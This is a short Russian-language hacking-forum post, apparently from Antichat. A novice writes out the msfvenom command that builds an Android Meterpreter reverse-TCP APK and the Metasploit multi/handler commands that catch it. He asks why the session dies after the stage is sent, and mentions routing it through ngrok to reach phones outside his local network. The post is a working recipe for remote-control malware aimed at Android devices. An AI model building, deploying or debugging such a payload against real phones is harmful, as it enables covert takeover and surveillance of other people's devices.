Показать сообщение отдельно

  #1  
Старый 20.10.2019, 15:34
s unity
Новичок
Регистрация: 18.09.2019
Сообщений: 0
С нами: 3502401

Репутация: 0
По умолчанию

всем приветики!!! такие вот дела: создаю payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=4444 -f raw -o /tmp/android.apk
потом:
msf5> use exploit/multi/handler
msf5> exploit(multi/handler) set PAYLOAD android/meterpreter/reverse_tcp
msf5> exploit(multi/handler) set LHOST 192.168.0.105
msf5> exploit(multi/handler) set LPORT 4444
msf5> exploit(multi/handler) exploit
запустился handler и слушает пакеты... в это время скидываю android.apk, запускаю.
такая картина:[*] Started reverse TCP handler on 192.168.0.105:4444[*] Sending stage (73550 bytes) to 192.168.0.104

прилетает сессия, handler учуял какие то движения на порту 4444, и все. метерпретер не запускается.
заметьте, это в локальной сети! если пропускать через ngrok сессия (не в локалке) токартина почти такая же. handler пишет что прилетела сессия 1, и так же метерпретер тупа не запускается....
я вот не пойму, это у меня что-то с метерпретером/метасплоитом или же проблема в другом?
PS примерно месяц назад все работало. может это обновления андроида? (обновил дроид неделю назад). не верится что столько лет жили с такой уязвимость, а тут неделю назад решили устранить это..
я бы поробовал на более старой версии андроида но нет его у меня, зато есть вы и античат
 
Ответить с цитированием